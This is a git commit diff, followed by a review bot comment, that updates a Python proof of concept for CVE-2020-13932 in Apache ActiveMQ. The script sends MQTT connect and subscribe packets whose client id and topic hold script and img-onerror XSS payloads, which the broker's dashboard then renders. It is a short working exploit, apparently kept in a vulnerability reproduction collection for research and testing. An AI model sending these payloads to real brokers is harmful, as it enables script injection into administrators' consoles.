update cve/apache-activemq/2020/CVE-2020-13932/poc.py.
Signed-off-by: ZodiacLyu <lvyusong@buaa.edu.cn>
parent
cd94b89bfd
commit
af6a794492
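--- a/cve/apache-activemq/2020/CVE-2020-13932/poc.py
+++ b/cve/apache-activemq/2020/CVE-2020-13932/poc.py
@@ -1,18 +1,22 @@
-from scapy.contrib.mqtt import *
-from scapy.compat import raw
 import time
 import socket
+from scapy.contrib.mqtt import *
+from scapy.compat import raw
 
 brokerIP = "" # input the server IP here
 brokerPort = 1883 # The default listen port of MQTT is 1883
-clientid = "<script>alert(1)</script>" # malformed clientid
+clientid = "<script>alert(0)</script>" #Malformed Clientid
+malformedTopic = "<img src=\"1.1.1.1\" onerror=\"alert(1)\">" # Malformed Topic
 
 if __name__ == '__main__':
 connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
-# craft the malformed connect message
+# Malformed Connect Message
+subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
+# Malformed Subscribe Message
 conn = socket.socket()
 conn.connect((brokerIP, brokerPort))
 conn.send(raw(connMessage))
-# Then check the dashboard to see malformed connection
-time.sleep(20)
-conn.close()
+time.sleep(1)
+conn.send(raw(subMessage))
+input() # Keep the MQTT Connection
+conn.close()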
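Review bot: The rewrite drops the only comment that told the reader how to confirm the result (`# Then check the dashboard to see malformed connection`), and the new blocking `input()` line does not say what to look at while the connection is held open. I would restore that guidance directly above `input()`, for example `# Keep the connection open while checking the dashboard; a fixed broker should presumably show the client id and topic as escaped text`. The two new `# Malformed ... Message` comments sit below the statements they describe and would read better above them. Separately, `brokerIP` is still an empty string and nothing rejects it before `conn.connect((brokerIP, brokerPort))`; a guard such as `if not brokerIP: raise SystemExit("set brokerIP to the test broker")` would make an unconfigured run fail clearly instead of attempting a connection.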